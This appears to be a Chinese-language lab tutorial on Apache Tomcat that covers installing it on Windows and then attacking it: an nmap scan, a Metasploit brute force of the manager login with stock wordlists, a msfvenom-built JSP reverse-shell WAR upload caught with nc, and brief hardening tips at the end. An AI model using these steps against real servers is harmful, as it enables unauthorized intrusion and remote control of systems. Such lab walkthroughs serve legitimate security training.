简介
Tomcat是Apache 软件基金会(Apache Software Foundation)的Jakarta 项目中的一个核心项目,由Apache、Sun 和其他一些公司及个人共同开发而成。由于有了Sun 的参与和支持,最新的Servlet 和JSP 规范总是能在Tomcat 中得到体现,Tomcat 5支持最新的Servlet 2.4 和JSP 2.0 规范。因为Tomcat 技术先进、性能稳定,而且免费,因而深受Java 爱好者的喜爱并得到了部分软件开发商的认可,成为目前比较流行的Web 应用服务器。
Tomcat 服务器是一个免费的开放源代码的Web 应用服务器,属于轻量级应用服务器,在中小型系统和并发访问用户不是很多的场合下被普遍使用,是开发和调试JSP 程序的首选。对于一个初学者来说,可以这样认为,当在一台机器上配置好Apache 服务器,可利用它响应HTML(标准通用标记语言下的一个应用)页面的访问请求。实际上Tomcat是Apache 服务器的扩展,但运行时它是独立运行的,所以当你运行tomcat 时,它实际上作为一个与Apache 独立的进程单独运行的。
免责声明
本文章只作为技术分享学习,如有违法行为,后果自负
环境搭建
官网下载tomcat
https://tomcat.apache.org/
根据自己的java版本下载
配置系统环境变量
下载安装包后进行解压
配置系统环境变量
在系统环境变量中新建
变量名大写的 JAVA_HOME
变量值为jdl安装路径 找到java jdk的安装目标复制到 变量值
系统环境变量 找到path
新增一个
引用Java环境变量
输入 %JAVA_HOME%\bin
启动tomcat
配置完成后找到tomcat文件 打开找到bin目录 在路径输入cmd运行 浏览器访问8080端口
启动startup.bat
关闭shutdown.bat
漏洞复现
输入IP为空白页面
空白页面测试方法,端口扫描、目录扫描
信息收集
工具使用nmap
先使用nmap扫描端口
nmap -sT -sV -O -A IP
tomato弱口令爆破
工具使用msf
访问8080端口 发现是tomcat找到后台登录界面 进行弱口令爆破
kali 使用msf选择tomcat进行爆破
使用登录框爆破模块:use auxiliary/scanner/http/tomcat_mgr_login
选择kali自带字典和目标IP:set rhosts IP
rua开始爆破
得到密码
tomcat上传恶意war包
工具使用msf
在msf生成tomcat war包进行上传
msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击机IP LPORT=nc监听端口号 -f war -o 文件名.war
登录tomcat上传war
nc反弹
打开nc进行监测 输入刚刚输入的端口号
在tomcat界面点击刚刚上传的war包
get shell成功
tomcat加固修复
修改默认端口
开启日志访问
重定向错误页面
删除默认应用程序
升级版本打补丁